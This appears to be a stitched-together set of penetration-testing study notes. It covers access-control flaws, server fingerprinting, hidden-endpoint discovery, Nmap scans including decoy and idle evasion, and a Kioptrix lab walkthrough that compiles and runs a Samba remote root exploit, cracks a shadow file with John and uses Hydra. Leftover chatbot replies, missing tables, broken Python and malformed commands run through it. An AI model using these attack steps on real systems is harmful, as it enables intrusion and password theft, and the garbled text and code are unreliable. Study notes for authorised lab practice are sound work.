If the application does not enforce proper authorization checks before executing the delete operation, an attacker could invoke this function to delete accounts they are not authorized to delete.

Risks Associated with MFLAC

• Unauthorized Operations: Attackers can perform actions they are not permitted to, such as deleting or modifying data.
• Data Integrity Issues: Critical data can be altered or destroyed without proper authorization.
• Compliance Violations: Breaches of data protection regulations.
• Reputation Damage: Loss of trust from users due to security incidents.

Detecting and Preventing MFLAC

Detection

1. Manual Testing:

   • Identify endpoints that perform sensitive operations.
   • Attempt to invoke these functions without proper authorization.
   • Verify if unauthorized operations are possible.

2. Automated Tools:

   • Use tools like Burp Suite or OWASP ZAP to scan for MFLAC vulnerabilities.
   • Configure tools to test function-level authorization by attempting unauthorized operations.

Prevention

• Implement Access Controls: Ensure that every function call is checked against the user’s permissions.
• Use Role-Based Access Control (RBAC): Define roles and permissions clearly and enforce them at the function level.
• Principle of Least Privilege: Grant users only the minimum level of access necessary to perform their tasks.
• Regular Audits: Conduct regular security audits and code reviews to identify and fix authorization issues.
• Security Training: Educate developers on secure coding practices to prevent MFLAC vulnerabilities.

Example of Testing for MFLAC

Consider an API endpoint:

DELETE /api/user/delete

1. Initial Request: Attempt to delete a user account without proper authorization.
2. Analyze Response: If the account is deleted successfully, a MFLAC vulnerability is present.

By implementing robust authorization checks and regularly testing for vulnerabilities, applications can mitigate the risks associated with MFLAC and protect sensitive user data.

To discover server-side technologies based on an HTTP response, you can follow these systematic steps. This process involves analyzing the request, examining the response headers, and using various tools and techniques to gather more information about the server.

Discover Server-Side Technology in HTTP Response
GET /auth/cdcservlet?goto=https%3A%2F%2Fpremium_tm.example-cc.jp%3A443%2F&RequestID=29331&MajorVersion=1&MinorVersion=0&ProviderID=https%3A%2F%2Fclus30oamsso301.example.net%3A443%2Famagent&IssueInstant=2013-10-28T13%3A50%3A38Z HTTP/1.1
Host: login.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://login.example.com/auth/UI/Login
Cookie: JSESSIONID=2D7A9C1B95BA49EB7E36674137BD8DFA;    

Step-by-Step Analysis

1. Understand the HTTP Request Structure:

   • The request provided shows a GET request directed at the URL /auth/cdcservlet.
   • The Host header specifies the domain (login.example.com), and various other headers indicate the browser type, accepted content types, and session identifiers.

2. Analyze the URL Path and Query Parameters:

   • The path /auth/cdcservlet suggests that the server is likely running a Java-based application (e.g., Java Servlet).
   • The presence of parameters in the query string (e.g., goto, RequestID, MajorVersion, MinorVersion, ProviderID, IssueInstant) might hint at functionalities related to session management or [SSO] (Single Sign-On).

3. Check Response Headers:

   • Make a request to this URL and examine the HTTP response headers using developer tools available in browsers or tools like Postman, cURL, or browser extensions like HTTP Header Live.
   • Look for Server headers, which often indicate the server type (e.g., Apache, Nginx, Microsoft-IIS).
   • The X-Powered-By header can reveal information about the server technology (like PHP, ASP.NET, etc.).
   • See if there are any other custom headers that provide insights into the framework or language (like X-Frame-Options, X-Content-Type-Options, etc.).

4. Look for Technology-Specific Patterns:

   • Evaluate any other endpoints or URLs. For example, .jsp or .php extensions in resources may indicate the use of specific technologies.
   • Check for patterns in the API structure or response payloads that might suggest the use of frameworks (e.g., Spring, Laravel).

5. Use Online Tools:

   • Utilize tools such as BuiltWith, Wappalyzer, or Netcraft to analyze the website. These tools can give you an overview of the technologies the site uses based on various fingerprints.
   • You can also use Nmap with the http-server-header script to enumerate servers and determine technologies.

Here’s a comparison table of some popular online tools for website technology analysis, such as BuiltWith, Wappalyzer, and Netcraft. The comparison considers features such as rating, open-source availability, and community engagement.

6. Explore Server Response Content:

   • Inspect the body of the HTTP response for comments, scripts, or other identifiers. Some applications may leave version numbers or technology-specific files within their HTML source.

7. Perform Fingerprinting:

   • Use fingerprinting tools (e.g., WhatWeb, Webtech, or Detectify) to scan the server and identify technologies.
   • These tools analyze the headers, response patterns, and any resources loaded to determine the server software.

Here’s a comparison table of some popular fingerprinting tools used for identifying web technologies like WhatWeb, Webtech, and Detectify. The comparison includes ratings, open-source availability, and community engagement.

8. Monitor Cookies and Sessions:

   • Examine cookies sent by the server (like JSESSIONID) and any session management practices suggested by their usage. Java applications typically use JSESSIONID, which implies a Java Servlet container.

9. Explore Error Pages:

   • Generate a few invalid requests intentionally. Often, error responses contain valuable information about the underlying framework in the messages.

10. Check for Versioning Information:

• If applicable, look for version strings in headers, comments, or error messages. Server software often unintentionally exposes these details through poorly configured error handling.

11. Review Any Redirects:

• If the response contains redirects (3xx status codes), examine the final destination with the same analysis efforts. Sometimes a different server provides more concrete information.

Conclusion

By following these steps, you can systematically uncover server-side technologies behind an HTTP response. Always practice responsible disclosure and ethical considerations when analyzing web technologies, respecting privacy and security.

Discovering hidden functionalities in a web application can involve a combination of manual testing and automated tools. This process often requires security testing techniques that may include looking for [S2]unlinked pages, hidden endpoints, and features not immediately visible to regular users. Here’s a real-world example, demonstrating how to approach this step-by-step.

Entry-Point example

Let’s first correct the OCR mistakes in the provided string and then analyze it step-by-step to discover server-side technologies.

Corrected String

Here’s the corrected version of the string with potential OCR errors fixed:

GET /auth/cdcservlet?goto=https%3A%2F%2Fpremium.example-cc.jp%3A443%2F&RequestID=29331&MajorVersion=1&MinorVersion=0&ProviderID=https%3A%2F%2Fdus30oamsso301.example.net%3A443%2Famagent&IssueInstant=2013-10-28T13%3A50%3A38Z HTTP/1.1
Host: login.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://login.example.com/auth/UI/Login
Cookie: JSESSIONID=2D7A9C1B95BA49EB7E36674137BD8DFA;

Analysis to Discover Server-Side Technology

To discover the server-side technology based on the corrected string, follow these steps:

Step 1: Analyze the Request Structure

• Endpoint: The endpoint /auth/cdcservlet suggests a servlet, likely indicating a Java-based backend (e.g., an application running on a Java servlet container like Apache Tomcat).

• Query Parameters:

  • goto, RequestID, MajorVersion, MinorVersion, ProviderID, IssueInstant suggests functionality related to authentication.
  • Investigate how these parameters behave when modified.

Step 2: Check for Response Headers

• Use Developer Tools / HTTP Client: Use tools like Burp Suite, Postman, or browser Developer Tools to examine the response headers when hitting the endpoint.
  • Look for:
    • Server header: Might indicate if it’s running on Apache, Nginx, etc.
    • X-Powered-By header: Can indicate the underlying language/framework (like PHP, Express, etc.).

Step 3: Explore HTTP Responses

• Make Requests: Send a request to the endpoint and observe the HTTP responses.
• Look for Error Messages: Check if invalid requests return distinctive error messages that might divulge technology information (e.g., stack traces).

Step 4: Analyze HTML/JS Responses

• Inspect Response Body:
  • Check for comments in HTML or JavaScript files and look for specific libraries or framework references.
  • Analyze any JavaScript files loaded on the page for library detections or exposed APIs.

Step 5: Directory and Endpoint Enumeration

• Brute-forcing: Utilize tools like Gobuster or Dirb to enumerate directories and files.
• Common Endpoints: Try common endpoints and see if valid responses are returned. For example, changing /account/view?id=123 to /account/view?id=124.

Absolutely! There are several additional common endpoints that are often found in web applications, and it’s beneficial to include them for more comprehensive testing. Here’s an extension of your original list with new common endpoints:

Additional Common Endpoints

Sure! Below is the merged table containing both the original and additional common endpoints for web applications:

Common Endpoints

• Web objects

Variations for Testing

• Modify query parameters in endpoints:

  • From /account/view?id=123 to /account/view?id=124, etc.
  • From /api/data?query=abc to /api/data?query=xyz.

• Common suffixes to try with paths:

  • /admin.php, /admin.html, /admin.jsp, /admin.asp (depending on the technology stack).

• Look for versioning in APIs:

  • Example: /api/v1/users, /api/v2/orders, etc.

Variations for Testing

• Login & Authentication:

  • Test variations on login credentials, like /?username=test&password=wrongpass, to evaluate security.

• Subdirectories and Subdomains:

  • Look for subdomains such as admin.domain.com or api.domain.com.

• Access Control Variants:

  • Test user role variations on endpoints, like /admin/users, /admin/settings, etc.

Step 6: Check for Vulnerabilities

• Security Scanners: Use tools like OWASP ZAP or Burp Suite Scanner to look for vulnerabilities in the application that might expose hidden features or misconfigurations.

Step 7: Manual Testing of Parameters

• Parameter Tampering: Change values of the query parameters and headers to see how the server responds.
• Try variants like ?goto=..... with different values to check for potential unlinked pages.

Step 8: Utilize Online Tools

• Technology Profilers: Use tools like BuiltWith, Wappalyzer, or Netcraft to analyze response characteristics and potential server technologies.

Conclusion

By following these steps, you can systematically explore the server-side technologies and discover functionalities hidden behind the HTTP request. Always remember to perform these activities ethically and in compliance with legal guidelines.

Example Scenario: Discovering Hidden Functionality in a Web Application

Target Application: A fictional online banking application.

Step 1: Information Gathering

1. Understand the Application:

   • Familiarize yourself with the application through its frontend (login pages, features, etc.).
   • Identify standard functionalities (e.g., account login, balance inquiries, transferring funds).

2. Use Tools:

   • Utilize a web application scanner (like Burp Suite, OWASP ZAP, or Nikto) to enumerate endpoints and check for vulnerabilities.
   • Manually browse the website to identify various links, features, and error handling messages.

3. Check Robots.txt:

   • Access http://example.com/robots.txt to identify disallowed directories that may lead to hidden functionality.

Step 2: Exploring URLs and Parameters

4. Enumerate Common Endpoints:

   • Begin by manually changing parameters in the URL. For example, changing /account/view?id=123 to /account/view?id=124, or testing common endpoints like /admin, /settings, /config, or /api.

5. Identify Hidden Pages:

   • Use a tool like Dirb or Gobuster to brute-force directory names from a wordlist. This can reveal hidden admin panels, documentation, or other resources not linked from the main application.

Here’s a comparison table for tools commonly used to identify hidden pages through directory brute-forcing, such as Dirb and Gobuster. This table includes ratings, open-source availability, and community engagement.

Step 3: Examine Response Variations

6. Analyze HTTP Responses:

   • Use tools like Burp Suite’s proxy to capture and analyze HTTP responses. Look for inconsistencies or unusual status codes (e.g., a normal login page returning a different response for an invalid user versus a valid one).

7. Check for Query String Parameters:

   • Test various parameters and their combinations in the URLs, like ?debug=true, which might reveal additional debugging information or functionalities.

Step 4: Test Existing Functionality

8. Inspect Forms:
   • Analyze forms available on the website. Look for fields like hidden inputs, parameters not immediately visible which can manipulate requests.
   • Try injecting extra data via the forms to see how the application responds (e.g., SQL injection attempts, special characters).

Step 5: Use Automated Testing Tools

9. Run Automated Scans:
   • Use tools like Burp Scanner or OWASP ZAP to run automated tests on your application. These tools can help identify vulnerabilities including SQL injection, XSS, or misconfigured settings that may expose hidden functionalities.

Step 6: Analyze Client-Side Code

10. Inspect Client-Side Code:
    • Check JavaScript files for commented-out code or references to functions that may indicate hidden or unlinked functionality.
    • Use browser developer tools (like Chrome DevTools) to inspect the source code and network requests that might reveal additional endpoints activated by specific actions.

Step 7: Refine Your Approach

11. Iterate on Findings:

    • If any hidden functionalities are discovered, analyze how they can be accessed. Document what you find and create test cases.

12. Exploit Vulnerabilities (if applicable):

    • Once hidden functionalities are discovered, determine if there are vulnerabilities present that allow unauthorized access, data extraction, etc.

Step 8: Report Findings

13. Create a Comprehensive Report:
    • Summarize your activities, findings (including screenshots and examples), and recommendations for securing uncovered functionalities.

Conclusion

By following these steps, you can systematically discover hidden functionalities in a web application. Always ensure you have permission before testing applications and adhere to ethical guidelines and legal requirements.

Acunetix

Purpose: Acunetix is primarily a web application security scanner. It is designed to identify vulnerabilities in web applications and services.

Key Features:

Automated Scanning: It automates the process of vulnerability assessment, checking for common vulnerabilities like SQL Injection, Cross-Site Scripting (XSS), and others. Web Application Focus: Targeted specifically at web applications, it can identify issues like misconfigurations, security missteps, and code vulnerabilities. Reporting: Generates comprehensive reports that provide insights into identified vulnerabilities, risk levels, and remediation advice. Integration: Can integrate with other tools like issue trackers (e.g., JIRA) for a more streamlined development process. User Friendly: Generally has a user interface that is more oriented towards users who may not have deep technical skills, making it accessible for security teams and developers. Target Audience: Primarily web developers, security teams, and organizations looking to secure their web applications.

[T1]

Enumeration

• Interrogate discovered services to obtain available information • We will use nmap scripts (.nse) dpkg —L nmap -> /usr/share/nmap/scripts/ • Script categories: • default, discovery, auth, safe, intrusive, exploit, dos, vuln, http

• Examples

nmap --script smb-enum-shares.nse -p'445 —n 192.168.1.1 
nmap --script smb-enum-users.nse -p 445 —n 192.168.1.1 
nmap --script discovery 192.168.1.1
nmap --script dns-zone-transfer.nse --script-args dnszonetransfer.domain=abc.xyz.com -p 53 ns.xyz.com

NMap

Purpose: Nmap (Network Mapper) is primarily a network scanning tool used for network discovery and security auditing.

Key Features:

Network Discovery: Can discover hosts and services on a network, mapping out devices and their open ports. Service and OS Detection: Nmap can identify running services and their versions, and even guess the operating system of the target devices. Scripting Engine: Nmap supports a scripting engine (NSE) that allows users to use scripts to automate various tasks and extend functionality. Flexible Scanning Options: Offers a variety of scanning techniques (e.g., TCP SYN scan, UDP scan), highly configurable for different scenarios. Command-Line Based: While there are GUIs available (like Zenmap), Nmap is primarily a command-line tool, appealing to power users and network administrators.

Usecase

• Monitoring ports, etc.
• Running jobs

Sub tools

• ZenMap
• ZCat
• NCrack
• NDiff
• NPing

nmap -{types(s)} -{opt(s)} {target}

Using

To find open ports:

nmap -A ip

# do not use selay_scan with max_parallelism
nmap -P0 -n -sS --max_hostgroup 1 --max-retries 0 --max_parallelism 10 ip

nmap -T5 ip

Syn explorer:

nmap -sS -T5 ip

Null explorer:

nmap -sN -T5 ip

Ack explorer:

nmap -sA -T5 ip

Idle explorer:

nmap -v -O -Pn -n ip

Scan some IPs from a file:

nmap -iL file.txt

Fast scan to show open common ports

nmap -F ip

Scan specified range ports

nmap -p 1-1000 targetip

scan as a timing on Target IP

nmap -p 1-65535 -T4 -A -Pn -v targetip

outout scan to a file

nmap -oG testoutput.txt targetip

output: Network Distance : 1 hop means the rate/distance of a Zambii! TCP Sew Prediction: Difficulty=195 (Good Luck)

So, It is not ideal rate but we can use it as a Zambii system (our target).

Review for scanning

• Sending Syn/Ack to zambii, we will get RST of a partition.
• Sending a bad package to zambii
• Sending RST package form zambii
• Repeatting

# Pn do not need to ping
# sI doing disabled explorer on zambii sys with ip1
nmap -p ports(,,) -Pn -SI ip1 ip2

Avoid penetration detection system

Messing up the information stored in the firewall and making it difficult for the system administrator to check the firewall information.

# -D doing expolorer on a bait
# -P ports
nmap -D IPs, ME -p Ports -Pn ip
# Nmap scan report for ip

Scripts

Using buil-in scripts

cd /usr/local/share/nmap/scripts
ls -lah
nmap --script-help "banner.nse"
nmap -Pn -sC ip
nmap -v -p ports --script=smb-os-discovery targetip

Writing a customize script

# After adding Script.nse file to another scripts of nmap, run:
nmap -script-updatedb
# use created file

Question[Interview]: Discussing the use of FIN/ACK scans as an alternative to SYN attacks can be advantageous for bypassing firewalls anonymously[S2]?

In a cybersecurity interview, if you’re discussing techniques for bypassing firewalls or conducting reconnaissance, mentioning “FinAck” as an alternative to “SynAttack” should be approached with caution, ensuring you explain the concepts clearly and appropriately. Here’s how you can elaborate on this topic:

Explanation of FIN/ACK and SYN Attacks

 def analyze_packet_type(packet):
    alert_level = 'UNKNOWN'  # Default alert level
       if packet.type == 'SYN':
           # Higher chance of detection
           alert_level = 'HIGH'
       elif packet.type == 'FIN/ACK':
           # May bypass some detection methods
           alert_level = 'MEDIUM'
       return alert_level
    enumerate(numbers)

# Example usage of enumerate
numbers = [1, 2, 3, 4, 5]
for index, number in enumerate(numbers):
    print(f"Index: {index}, Number: {number}")

1. SYN Attack:

   • A SYN attack (or SYN flood attack) exploits the TCP three-way handshake process. In this attack, the attacker sends a flood of SYN (synchronize) packets to a target server with spoofed IP addresses, overwhelming the server’s ability to respond and potentially causing denial of service.
   • Detection: Firewalls and intrusion detection systems (IDS) are often equipped to detect unusual SYN traffic patterns, making SYN attacks easier to identify.

2. FIN/ACK Attack:

   • A FIN/ACK attack takes advantage of TCP’s connection termination process. The attacker sends FIN (finish) packets to a target, which are used to indicate the end of a TCP connection. This can confuse firewalls and may not trigger the same defensive measures as SYN floods since FIN packets are generally associated with legitimate connection termination.
   • Such attacks are less common and can be used to probe for open ports or to bypass certain firewall restrictions, as they may not look suspicious immediately.

Discussion in an Interview Context

When discussing the merits of using FIN/ACK over SYN attacks during an interview, consider these aspects:

• Stealth: Explain that FIN/ACK packets might evade some firewall rules, particularly if the firewall mainly monitors for SYN packets.
• Intrusion Testing: Describe scenarios where a penetration tester might use FIN/ACK packets to check for vulnerabilities in a network’s security configuration.
• Network Behavior Understanding: Emphasize the importance of understanding how different types of packets interact with firewalls and IDS systems, advocating for a thorough knowledge of TCP/IP and network protocols.

Ethical Considerations

It’s crucial to stress that any discussion of these techniques should be framed within an ethical context:

• Legal Permission: Engage in ethical hacking only with explicit permission from the system owner. Unauthorized attempts to exploit vulnerabilities are illegal and unethical.
• Purpose of Knowledge: Stress that understanding these techniques is essential for cybersecurity professionals to protect networks, conduct penetration testing responsibly, and respond to potential threats effectively.

In summary, while discussing FIN/ACK versus SYN attacks in a cybersecurity interview, you should effectively communicate the technical details, risks, and ethical implications of these methods. This approach will demonstrate not only your technical acumen but also your awareness of the importance of ethical conduct in cybersecurity practices.

Certainly! When discussing FIN/ACK and SYN attacks in a cybersecurity context, using tools like Nmap for practical demonstrations can enhance your understanding and provide concrete examples to share during your interview. Here’s how you can incorporate specific Nmap commands related to these concepts:

Nmap and Port Scanning Techniques

1. SYN Scan Using Nmap

A SYN scan is one of the most common methods used to identify open ports on a target system. The command for conducting a SYN scan with Nmap is:

nmap -sS <target_ip>

• Explanation: The -sS flag instructs Nmap to perform a SYN scan. This method sends SYN packets to ports and waits for a response to determine the state of each port (open, closed, or filtered).

2. FIN Scan Using Nmap

A FIN scan can be used to attempt to evade firewall rules, as it sends FIN packets to probe ports. Here’s how you can perform a FIN scan with Nmap:

nmap -sF <target_ip>

• Explanation: The -sF flag tells Nmap to execute a FIN scan, sending FIN packets to the specified target. If a port is closed, the system will respond with a RST (reset) packet. If the port is open, there will typically be no response, which can help in determining the state of the port without triggering certain firewall rules.

Practical Discussion Points

When discussing these commands in your interview, consider the following points:

• Packet Behavior: Explain how different packets (SYN vs. FIN) interact with firewalls. For example, a SYN scan can be easily detected, while a FIN scan may be less likely to raise alarms because FIN packets are used in legitimate connection termination.

• Evasion Techniques: Highlight why understanding these techniques is essential for network security professionals. For instance, using FIN scans can help an ethical hacker determine firewall behavior without triggering standard defenses.

• Reconnaissance Value: Discuss the implications of these scans in reconnaissance phases of penetration testing, emphasizing the need for stealthy methods to gather information about a target without alerting them prematurely.

Identification

Commands

chmod

Grant to users only:

chmod u+x installer.msi

Group, Directory and Subdirectory:

chmod g+x installer.msi

Knowledge-based[1]

• password
• pass-faces
• PINs
• pass-phrase
• pass-sentences
• graphical password

Possession-based[1]

• memory token(magnetic card)
• smart tokens(integrated circuits)

Biometric-based[1]

• physiological
• behavioral

Types [1]

Centralized

• Inexpensive
• Easy to configure

Decentralized

• each has its own database

Implicit

• Is a flow to obtain an access to token authorized API req.
• Running in env that don’t provide secure storage

Explicit

• Like OAtuth 2.0
• process of granting/denying
• based on user’s identity
• assigned permissions

• kioptrix

keywords: nmap,kioptrix,unicornscan,smbclient,searchsploit,atftpd,netstat,nc, john_password,xhydra,thc_hydra,atftpd

[T1]

Kioptrix

to make a vulnerability environment for testing.

Steps for attacking

• [1] scanning

nmap -f -n -P0 -v -p- -T4 ip

Fetch details of opend ports

# For udp ports
unicornscan -mT -r500 -I ip

Detection of version of sw & opened ports

nmap -n -sTUV -pT:ports,U:ip1 ip2

Gathering signals

nc

# connect to port 80
nc ip 80

ncat

# gather http signs
ncat ip

smbclient

# connect to a fantastic port 139 
smbclient - ip -N
# L means I do not have a password
smbclient -L ip -N

Output Samba 2.2.1a. Now we are set to find vulnerabilities folowed version.

• Exploit-DB

Searching keyword Samba and port 139. [[exploit_remote]]

./searchsploit samba
# reports:
# samba 2.2.8 Remote Root Exploit -sambal.c
# /linux/remote/10.c
cp /pentest/exploits/exploitdb/platforms/linux/remote/10.c /root/10.c
# after review we must compile the file
nano 10.c
# q:
gcc 10.c -o SambaVuln10
# Compile the code:
./SambaVuln10
./SambaVuln10 -v -d0 -S ip
./SambaVuln10 -b0 -v ip

After entered to remote sys

whoami
hostname
lastlog

Some clients have TFTP service. So, we can connect to them.

atftpd --daemon --port 69 --bind-address ip /tmp
netstat -anu | grep 69

Eventually, install pure-ftp on BackTrack OS. create a connection from BT OS to Kioptrix OS. Finally:

cd /pentest/passwords/john
john /var/public/shadow

After coennect to the kioptrix We will use #THC_Hydra to hack passwords.

./SambaVuln_10 -b 0 ip

Alternatively we can use #Xhydra GUI to attack a machine with Port 22. protocol aftp. For now we can add showed password to BackTrack file: passwords/wordlists/darkc0de.lst in path of /oentest/passwprds/wordlists

Alternatively we can use Metasploit to save in database.

msfupdate
msfconsole

Models

OSI

Open Systems Interconnection model is a conceptual framework used to understand and implement network communications. It consists of seven layers, each with distinct functions:

1. Physical Layer: This layer is responsible for the physical connection between devices, including the transmission and reception of raw binary data over a physical medium (e.g., cables, switches). It includes hardware elements like cables, switches, and the electrical signals that pass through them.

2. Data Link Layer[S1]: The data link layer ensures reliable communication between directly connected nodes. It manages error detection and correction, framing, and flow control. Common protocols at this layer include Ethernet and Wi-Fi.

3. Network Layer: This layer manages routing and forwarding of data packets across the network. It determines the best paths for data transmission and handles logical addressing (e.g., IP addresses). Key protocols include IP (Internet Protocol).

4. Transport Layer: The transport layer provides reliable data transfer services to the upper layers, ensuring error recovery and flow control. It breaks down messages into packets and is responsible for end-to-end communication. Common protocols include TCP (Transmission Control Protocol) and UDP (User Datagram Protocol).

5. Session Layer: This layer manages sessions, which are established and maintained for communication between applications. It handles the opening, closing, and management of sessions, allowing for proper data synchronization.

6. Presentation Layer: The presentation layer is responsible for data translation, encryption, and compression. It ensures that data is in a usable format for the application layer. This layer translates data formats and provides data serialization/deserialization.

7. Application Layer: The topmost layer provides services directly to end-user applications. It encompasses protocols for various application services, such as HTTP (for web browsing), FTP (for file transfer), and SMTP (for email).

Understanding the OSI model can help in troubleshooting network issues and improving communication protocols.

Certainly! Below are the two sections combined, providing both the OSI model overview and the ASCII art representations of Protocol Data Units (PDUs) at various layers of the OSI model.

OSI Model Overview with PDUs and Protocols

+---------------------------------------------------+
|                      OSI Model                    |
+---------------------------------------------------+
| Layer 7: Application                               |
| +-----------------------------------------------+ |
| | PDU: Data                                     | |
| | Protocols:                                    | |
| |   - HTTP (Web)                               | |
| |   - FTP (File Transfer)                      | |
| |   - Telnet (Terminal Access)                 | |
| |   - DNS (Domain Name Service)                | |
| |   - SMTP (Email Transfer)                    | |
| |   - SNMP (Network Management)                | |
| +-----------------------------------------------+ |
|                                                   |
| Layer 6: Presentation                            | |
| +-----------------------------------------------+ |
| | PDU: Data                                     | |
| | Functions:                                    | |
| |   - Data Encoding                             | |
| |   - Data Compression                          | |
| |   - Encryption                                | |
| |   - Character Set Translation                 | |
| +-----------------------------------------------+ |
|                                                   |
| Layer 5: Session                                 | |
| +-----------------------------------------------+ |
| | PDU: Data                                     | |
| | Functions:                                    | |
| |   - Session Control                           | |
| |   - Establishing Connections                  | |
| |   - Session Termination                       | |
| |   - Synchronization                           | |
| +-----------------------------------------------+ |
|                                                   |
| Layer 4: Transport                               | |
| +-----------------------------------------------+ |
| | PDU: Segment for TCP / Datagram for UDP       | |
| | Protocols:                                    | |
| |   - TCP (Transmission Control Protocol)      | |
| |   - UDP (User Datagram Protocol)             | |
| | Functions:                                    | |
| |   - Reliable / Unreliable Delivery           | |
| |   - Flow Control                              | |
| |   - Segmentation and Reassembly               | |
| +-----------------------------------------------+ |
|                                                   |
| Layer 3: Network                                 | |
| +-----------------------------------------------+ |
| | PDU: Packet                                   | |
| | Protocols:                                    | |
| |   - IP (Internet Protocol)                   | |
| |   - ICMP (Internet Control Message Protocol) | |
| |   - IGMP (Internet Group Management Protocol) | |
| |   - ARP: (Address Resolution Protocol) | |
| | Functions:                                    | |
| |   - Routing                                   | |
| |   - Logical Addressing                        | |
| +-----------------------------------------------+ |
|                                                   |
| Layer 2: Data Link                              | |
| +-----------------------------------------------+ |
| | PDU: Frame                                    | |
| | Protocols:                                    | |
| |   - Ethernet                                  | |
| |   - PPP (Point-to-Point Protocol)           | |
| |   - HDLC (High-Level Data Link Control)      | |
| | Functions:                                    | |
| |   - MAC Addressing                            | |
| |   - Error Detection                           | |
| |   - Frame Synchronization                     | |
| +-----------------------------------------------+ |
|                                                   |
| Layer 1: Physical                               | |
| +-----------------------------------------------+ |
| | PDU: Bit                                      | |
| | Represents:                                   | |
| |   - Physical Medium (Cabling, Hubs)          | |
| |   - Electrical/Optical Signals                | |
| |   - Connector Types (RJ45, Fiber, etc.)      | |
| |   - Signal Types (Analog, Digital)           | |
| +-----------------------------------------------+ |
+---------------------------------------------------+

Explanation of Each Layer and Its PDU

1. Layer 7: Application

   • PDU: Data
   • Protocols:
     • HTTP: Hypertext Transfer Protocol for web content.
     • FTP: File Transfer Protocol for sending/receiving files.
     • Telnet: Terminal emulation for remote access.
     • DNS: Domain Name System for name resolution.
     • SMTP: Simple Mail Transfer Protocol for email transmission.
     • SNMP: Simple Network Management Protocol for managing network devices.

2. Layer 6: Presentation

   • PDU: Data
   • Functions:
     • Data Encoding: Conversion of data to a format usable by the application layer.
     • Data Compression: Reducing data size for transmission efficiency.
     • Encryption: Securing data for confidentiality.
     • Character Set Translation: Translating character sets for application compatibility.

3. Layer 5: Session

   • PDU: Data
   • Functions:
     • Session Control: Establishes, manages, and terminates sessions.
     • Synchronization: Keeps applications in sync during communication.
     • Session Termination: Ensures proper closure of communication sessions.

4. Layer 4: Transport

   • PDU: Segment (for TCP) / Datagram (for UDP)
   • Protocols:
     • TCP: Ensures reliable, ordered delivery of data.
     • UDP: Allows for faster, connectionless communication.
   • Functions:
     • Reliable/Unreliable Delivery: Guarantees delivery with TCP; up to application with UDP.
     • Flow Control: Mechanisms for controlling data transmission rates.
     • Segmentation and Reassembly: Splits data into smaller segments and reassembles at the destination.

5. Layer 3: Network

   • PDU: Packet
   • Protocols:
     • IP: Handles addressing and routing packets across networks.
     • ICMP: Sends error messages and operational information.
     • IGMP: Manages multicast group memberships.
     • ARP: Resolves IP addresses to MAC addr within a local net

6. Layer 2: Data Link

   • PDU: Frame
   • Protocols:
     • Ethernet: The most common LAN technology.
     • PPP: Protocol used for direct connections between two nodes.
     • HDLC: Standard for transmitting data over point-to-point links.

7. Layer 1: Physical

   • PDU: Bit
   • Represents:
     • Physical Medium: Cables, switches, and other hardware.
     • Electrical/Optical Signals: Transmits bits as electrical pulses or light.
     • Connector Types: RJ45, fiber optic connectors, etc.

Conclusion

This upgraded ASCII art representation provides a comprehensive view of the OSI model, clearly illustrating the layers, PDUs, protocols, and functions. Each layer builds on the last, ensuring data is correctly prepared, delivered, and interpreted across various network environments. This visual summary aids in understanding the structure and depth of communication in networked systems.

ASCII Art Representations of PDUs

You’re absolutely right to point out that the order of protocols within the stack was not traditional in my previous representation. Network protocols follow a specific hierarchy, and they are typically organized based on their functionality and how they interoperate. Here’s a corrected version of the ASCII art that represents the correct order of protocols in the networking stack:

Corrected Networking Protocol Stack

+--------------------------------------------------------+
|                     Application Layer                  |
| +----------------------------------------------------+ |
| |                     DNS Protocol                    | |
| | +---------------------------------------------+    | |
| | |                  DNS Header                 |    | |
| | | +-----------------------------------------+ |    | |
| | | | Transaction ID (16 bits)                | |    | |
| | | +-----------------------------------------+ |    | |
| | | | Flags (16 bits)                         | |    | |
| | | |   QR (1 bit)  | Opcode (4 bits)       | |    | |
| | | |   AA (1 bit)  | TC (1 bit)  | RD (1 bit) | |    | |
| | | |   RA (1 bit)  | Z (3 bits)  | RCODE (4 bits)| |  |
| | | +-----------------------------------------+ |    | |
| | | | Questions (16 bits)                   | |    | |
| | | +---------------------------------------+  |    | |
| | | | Answer RRs (16 bits)                  | |    | |
| | | +---------------------------------------+  |    | |
| | | | Authority RRs (16 bits)               | |    | |
| | | +---------------------------------------+  |    | |
| | | | Additional RRs (16 bits)              | |    | |
| | | +---------------------------------------+  |    | |
| | | |              Questions Section         | |    | |
| | | |              (Variable Length)         | |    | |
| | | +---------------------------------------+  |    | |
| | | |              Answers Section           | |    | |
| | | |              (Variable Length)         | |    | |
| | | +---------------------------------------+  |    | |
| | +---------------------------------------------+    | |
| +----------------------------------------------------+ |
+--------------------------------------------------------+

+--------------------------------------------------------+
|                     Transport Layer                    |
| +----------------------------------------------------+ |
| |                     TCP Segment                     | |
| | +------------------------------------------------+ | |
| | |                TCP Header                       | | |
| | | +--------------------------------+ +------------+ | |
| | | |     Source Port               | |  Dest Port | | |
| | | |            16 bits            | |    16 bits | | |
| | | +--------------------------------+ +------------+ | |
| | | | Sequence Number (32 bits)                 | | |
| | | +--------------------------------------------+ | |
| | | | Acknowledgment Number (32 bits)           | | |
| | | +--------------------------------------------+ | |
| | | | Data Offset | Flags | Window Size          | | |
| | | |   4 bits   | 9 bits|  16 bits             | | |
| | | +--------------------------------------------+ | |
| | | | Checksum (16 bits)                         | | |
| | | | Urgent Pointer (16 bits)                   | | |
| | | +--------------------------------------------+ | |
| | | |                Options (Variable)           | | |
| | | +--------------------------------------------+ | |
| | | |            Payload/Data                      | | |
| | | |                    (N bytes)                | | |
| | | +--------------------------------------------+ | |
| | +------------------------------------------------+ | |
| |                             + Checksum                |
| |                             + Flags                   |
| |                             + Sequence Number         |
| |                             + Acknowledgment Number   |
| |                             + Protocol (TCP)         |
| +----------------------------------------------------+ |
+--------------------------------------------------------+

+--------------------------------------------------------+
|                      Internet Layer                    |
| +----------------------------------------------------+ |
| |                     IP Packet                      | |
| | +------------------------------------------------+ | |
| | |                IP Header                        | | |
| | | +--------------------------------+ +-------------+ | |
| | | | Version | IHL | Type of Service | Total Length | | |
| | | |    4    |  4  |       8 bits      |   16 bits   | | |
| | | +--------------------------------+ +-------------+ | |
